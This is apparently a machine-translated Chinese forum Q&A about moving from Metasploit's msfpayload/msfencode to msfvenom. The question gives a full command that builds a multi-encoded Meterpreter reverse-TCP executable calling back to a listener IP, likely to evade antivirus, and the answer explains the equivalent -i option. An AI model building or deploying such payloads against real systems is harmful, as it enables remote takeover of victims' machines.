在以前版本的metasploit中,我们可以使用此代码生成多编码有效负载:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.217.133
LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe
但在新版本中更换了msfvenom ... 我如何通过msfvenom制作多编码有效载荷? 抱歉英文不好
答案 0 :(得分:0)
你可以通过“msfvenom”在你的脚本中“替换msfpayload和msfencode”
和“-i”而不是“-c”表示迭代次数或编码有效负载的时间
您可以输入您的终端
msfvenom
或
msfvenom -h
如果你知道msfpayload&编码,你应该能够毫无困难地使用msfvenom,同样的机制
有关详情,请参阅
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
你找到你要找的东西了!